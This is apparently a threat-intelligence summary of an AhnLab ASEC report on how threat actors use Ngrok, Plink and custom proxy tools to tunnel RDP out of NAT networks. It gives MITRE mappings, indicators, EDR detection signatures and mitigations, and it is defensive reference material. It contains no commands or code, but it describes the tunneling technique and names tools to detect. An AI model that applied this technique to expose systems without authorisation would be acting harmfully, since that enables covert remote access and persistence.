Full Report
After gaining control over infected systems, threat actors may also perform remote screen control using RDP. This is partly for convenience but can also serve the purpose of maintaining persistence. If the RDP service is not active during the attack process, threat actors may install RDP Wrappers, steal existing account credentials, or create new backdoor […] 게시물 Proxy Tools Detected by AhnLab EDR이 ASEC에 처음 등장했습니다.
Analysis Summary
# Tool/Technique: Ngrok / Plink / Custom Proxy Tools (used for RDP Tunneling)
## Overview
These tools (Ngrok, Plink, and custom-developed proxies) are utilized by threat actors to bypass network limitations, specifically when infected systems reside behind NAT environments, enabling persistent remote screen control via the Remote Desktop Protocol (RDP) from external attacker systems.
## Technical Details
- Type: Tool (Proxy/Tunneling Utility)
- Platform: Primarily Windows systems targeted by malware, used to establish connections outward.
- Capabilities: Exposes internal services (specifically RDP port 3389) to the public internet via tunneling or port forwarding.
- First Seen: Not explicitly stated for all customs, but Ngrok has been used by Kimsuky previously.
## MITRE ATT&CK Mapping
- T1090 - Proxy
- T1090.002 - External Proxy
- T1021 - Remote Services
- T1021.001 - Remote Desktop Protocol
## Functionality
### Core Capabilities
- **Ngrok:** Functions as a tunneling tool to expose systems within NAT environments to external access, often aimed at RDP port 3389.
- **Plink (PuTTY component):** Used as an SSH client to establish SSH connections or perform port forwarding, often configured for reverse tunneling (e.g., exposing a local RDP port externally).
- **Custom Proxies:** Threat actors, like Kimsuky and Andariel, develop proprietary proxy tools to achieve the same goal of external RDP exposure.
### Advanced Features
- **RDP Exposure:** The primary advanced feature is manipulating network connectivity to make an internal RDP service accessible over the internet, facilitating remote screen control and post-exploitation persistence.
- **Credential Theft/Backdoor Accounts:** The use of these proxies often follows or coincides with RDP service activation, credential stealing, or the creation of new backdoor accounts.
## Indicators of Compromise
- File Hashes: N/A (Tools are often legitimate binaries used maliciously, or custom files whose hashes are not provided).
- File Names: `p64.exe` (mentioned in a LockBit context using Plink).
- Registry Keys: N/A
- Network Indicators:
- Connections directed toward external SSH/tunneling servers used by threat actors.
- Attempts to expose/connect to the local RDP port (3389).
- Behavioral Indicators:
- Execution of `ngrok.exe` or `plink.exe` with specific arguments related to remote listening/forwarding.
- Execution of unknown, custom proxy tools performing network forwarding activities.
## Associated Threat Actors
- Kimsuky
- Andariel
- Lazarus Group (used a similar proxy tool in 2021)
- LockBit 3.0 ransomware operators
## Detection Methods
- **Signature-based detection:** AhnLab EDR identifies Ngrok execution behavior.
- **Behavioral detection:** AhnLab EDR identifies Plink activity as critical behavior. EDR detects suspicious behavior from proxy tools exposing RDP services externally.
- **YARA rules:** Not explicitly mentioned.
- **Specific EDR Signatures Provided:**
- `Execution/EDR.Ngrok.M11445`
- `Execution/EDR.Proxy.M12243`
- `Execution/DETECT.Plink.M12255`
## Mitigation Strategies
- Implement network segmentation to restrict internal lateral movement.
- Monitor and restrict the execution of known tunneling or proxy tools (Ngrok, Plink) in sensitive environments.
- Harden RDP configurations or restrict incoming RDP connections (Port 3389) to trusted internal sources only.
- Utilize EDR solutions capable of detecting the execution and suspicious network behavior associated with tunneling tools.
## Related Tools/Techniques
- RDP (Remote Desktop Protocol) for remote control/persistence.
- RDP Wrappers (mentioned as an alternative method if RDP is inactive).
- Custom proxy tools developed by threat actors.